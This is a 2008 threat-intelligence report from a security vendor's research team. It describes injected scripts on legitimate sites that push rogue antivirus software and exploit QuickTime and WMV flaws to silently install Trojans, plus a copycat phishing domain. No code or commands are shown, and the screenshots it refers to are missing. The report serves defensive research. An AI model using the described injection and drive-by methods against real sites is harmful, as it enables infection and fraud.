Attack Intelligence Research Center Monthly Threat Report MalWeb Continues to Make Waves on Legitimate Sites A l a d d i n. c o m / e S a f e
Following up on some recent attacks, the AIRC team wanted to see how the Web looks these days in terms of lessons learned, and the impact that MalWeb has on the average user. In completely subjective research, we hit our browsers in an attempt to emulate a benign business user and see how we would fare finding MalWeb-infested sites. To our surprise, the past year s advances in Web security haven t really been effective, and we started coming across sites in the likes of a radio station homepage, a large franchise management site and even a couple of government sites,which were all infested with malicious code just waiting to attack hapless users. RESEARCH PAPER
A l a d d i n. c o m / e S a f e
The reason for the eclectic array of (obviously) legitimate sites, is that our search terms were in the spirit of current news, career opportunities, elections, and personal finance. Digging into the attacks, we realized that there isn t anything new same old SQL injection into a vulnerable site, or cross-site scripting that infested a site s cache with problematic content that would come up on a search and have the visitor exposed to MalWeb. The usual suspect this time was a script that was included in all the sites mentioned above (and about 6,000 additional ones that we did not analyze thoroughly). esafe
The funny thing about this script is that it states its intentions to begin with if you do not already have the AntivirXP08 installed on your PC, well, you will now! For more references on rogue AV software used for social engineering of victims to install Trojans on their PCs see [sunbelt references]. Taking the next step to infection is as easy as not doing anything. Remember this is MalWeb, no interaction is needed. All you need to do is just VIEW the legitimate site, and the MalWeb takes care of the rest. Finally we get the somewhat more familiar obfuscated Java script that, when run, is actually doing this: A l a d d i n. c o m / e S a f e
1. Exploiting a QuickTime vulnerability 2. Exploiting a Microsoft WMV vulnerability And of course the traditional Trojan download and silent install in the background. Now for the really sarcastic part one of the domains used in the attack has only been registered since the day before (September 16th), and when looking at the contents for the homepage, another financially related story comes up on the front page: Looks really legitimate, and a quick search uncovers the culprit:
Looks familiar, but note that the legitimate site (as opposed to the malicious site hosting legitimate content), has a Security Center and Email Scam link in red font, which explains that the company in subject has been experiencing brand name theft, and several sites hosting their website content are luring unsuspecting victims for the purpose of phishing and other financial fraud. It appears as if we hit a fresh one the attacks have seemingly faded out according to research on the Web (http://www.bobbear.co.uk/nescoaccounting.html) that not only hosts the legitimate content, most likely for phishing, but also participates in the MalWeb to malware business, which is an interesting trend in today s turbulent economic times. The location of the participating domains is not a surprise. As usual, a capitalistic economy with commoditized products provides the best place to host any kind of Web content: Looking forward The experience from our latest Internet browsing ended up leaving somewhat of a bad taste. None of the sites we visited have been flagged as they should have by our fastidiously up-to-date browsers we are using the latest versions of Google Chrome and Firefox. Google or Yahoo didn t object, either, when the results came up containing the MalWeb-serving sites. Trying to make predictions in such a stagnant state of security is pretty challenging, however we do anticipate that although some more restrictions would be placed on MalWeb-serving sites, they would not be sufficient, and would be severely delayed. Truth be told some of the search results we received did contain warnings indicating the possibility that malicious content might be on the site, but NONE of these sites contained the malicious scripts anymore, and even some of the sites that were not flagged were already serving clean content. The AIRC team predicts that as criminals continue to generate as high returns on their activities as they do now, the methods of distribution will continue to evolve and the context in which MalWeb is served will turn more localized and more relevant to a specific period of time. You need only to watch your news tickers to guess where attackers are aiming their crossbows. A l a d d i n. c o m / e S a f e
About the Attack Intelligence Research Center The Aladdin Attack Intelligence Research Center (AIRC) is a premier facility for Internet threat detection and cybercrime investigation. The mission of the AIRC is to deliver security research and intelligence that educates, supports and strengthens the security community, and drives innovation in Aladdin s content security solutions. Based in Tel Aviv, the AIRC is comprised of global security researchers and law enforcement and cybercrime specialists dedicated to finding and eradicating Internet threats that compromise legitimate business safety. AIRC goes beyond traditional threat detection to provide business intelligence around evolving threats, predict future trends in Internet security, and uncover the inner workings and affects of the business of ecrime. For more information, visit www.aladdin.com/airc. About Aladdin Aladdin Knowledge Systems (NASDAQ: ALDN) is an information security leader with offices in 12 countries, a worldwide network of channel partners, and numerous awards for innovation. Aladdin etoken is the world s #1 USB-based authentication solution, offering identity and access management tools that protect sensitive data. Aladdin HASP SRM boosts growth for software developers and publishers through strong anti-piracy protection, IP protection, and secure licensing and product activation. Aladdin esafe delivers real-time intelligent Web gateway security that helps protect data and networks, improve productivity, and enable compliance. Visit www.aladdin.com.
For more contact information, visit: www.aladdin.com/contact North America: +1-800-562-2543, +1-847-818-3800 UK: +44-1753-622-266 Germany: +49-89-89-4221-0 France: +33-1-41-37-70-30 Benelux: +31-30-688-0800 Spain: +34-91-375-99-00 Italy: +39-022-4126712 Portugal: +351-21-412-36-60 Israel: +972-3-978-1111 China: +86-21-63847800 India: +91-22-67255943 Japan: +81-426-607-191 Mexico: +52-1-55-4159-9733 All other inquiries: +972-3-978-1111 2008 Aladdin Knowledge Systems, Ltd. All rights reserved. Aladdin is a registered trademark of Aladdin Knowledge Systems, Ltd. All other names are trademarks or registered trademarks of their respective owners.